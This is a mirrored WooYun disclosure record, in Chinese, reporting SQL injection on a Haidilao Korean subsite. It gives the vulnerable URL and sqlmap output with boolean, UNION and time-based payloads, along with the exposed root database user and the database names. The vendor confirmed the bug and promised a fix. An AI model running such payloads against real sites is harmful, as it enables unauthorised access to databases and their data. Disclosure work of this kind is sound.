乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-21: 细节已通知厂商并且等待厂商处理中 2015-12-21: 厂商已经确认,细节仅向厂商公开 2015-12-31: 细节向核心白帽子及相关领域专家公开 2016-01-10: 细节向普通白帽子公开 2016-01-20: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
海底捞某分站存在SQL注入漏洞
说好的礼物呢!让我这么辛苦的挖洞说好的礼物呢网站地址:http://kr.haidilao.com漏洞地址:
http://kr.haidilao.com/index.php/Dishes/feature/id/101
使用SQLmap 注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://kr.haidilao.com:80/index.php/Dishes/feature/id/101 AND 7316=7316 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: http://kr.haidilao.com:80/index.php/Dishes/feature/id/101 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a767a763a,0x61654e59565551654f46,0x3a6d77613a), NULL, NU Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://kr.haidilao.com:80/index.php/Dishes/feature/id/101 AND SLEEP(5)---[11:22:04] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: MySQL 5.0.11[11:22:04] [INFO] fetching current usercurrent user: 'root@localhost'[11:22:04] [INFO] fetching database namesavailable databases [4]:[*] h_hdl[*] information_schema[*] mysql[*] test
好了,就这些,求礼物呀!说好的礼物呢!
让我这么辛苦的挖洞说好的礼物呢网站地址:http://kr.haidilao.com漏洞地址:
你们懂的,求礼物呀!
危害等级:中
漏洞Rank:5
确认时间:2015-12-21 12:25
谢谢,我们已安排人员进行修复。
暂无